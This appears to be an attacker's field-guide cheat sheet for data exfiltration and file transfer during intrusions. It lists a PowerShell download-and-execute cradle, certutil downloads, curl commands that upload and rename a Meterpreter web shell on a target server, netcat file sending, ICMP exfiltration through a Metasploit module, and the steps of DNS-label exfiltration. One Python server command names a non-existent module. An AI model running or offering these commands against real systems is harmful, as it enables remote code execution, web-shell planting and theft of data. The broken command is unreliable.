Data Exfiltration
A field guide for moving data between various machines
Last updated: March 5th, 2023File Transfers
Windows
Below are some some commands to download specific files from an IP that the device can communicate with.
certutil.exe -urlcache -f https://x.x.x.x/file.txt file.txt
Invoke-WebRequest “https://x.x.x.x:xxxx/file.ps1” -OutFile “file.ps1”
iex (New-Object Net.Webclient).DownloadString(‘https://x.x.x.x:$port/file.ps1’)
copy \\x.x.x.x\share\file.exe . #copy from remote smb share
Linux
This includes commands to both upload and download files. I find myself more frequently using system agnostic commands if I'm attacking a Linux machine.
curl -X PUT https://x.x.x.x/met-shell.txt --data-binary @met-shell.txt
curl -X MOVE -H 'Destination: https://x.x.x.x/met-shell.aspx' https://x.x.x.x/met-shell.txt
System Agnostic
#netcat
nc -l -p 1234 > out.file #recieving
nc -w 3 x.x.x.x 1234 < out.file #sending
#python
python2 -m SimpleHTTPServer 80 #web server
python3 -m https.server 80
python -m pyftpdlib -p 21 --write #ftp server
python -m smtpd -n -c DebuggingServer :25 #smtp server
sudo smbserver.py share . -smb2support #smb server
#ssh
scp -r user@x.x.x.x:{file.txt,file.exe} .
#You can find wget installed on some windows machines that have commandline git
wget https://x.x.x.x/file
#icmp
msf5 > use auxiliary/server/icmp_exfil
ping MACHINE_IP -c 1 -p 74686d3a7472796861636b6d650a
#dns
1. Get the required data that needs to be transferred.
2. Encode the file.
3. Send the encoded characters as subdomain/labels.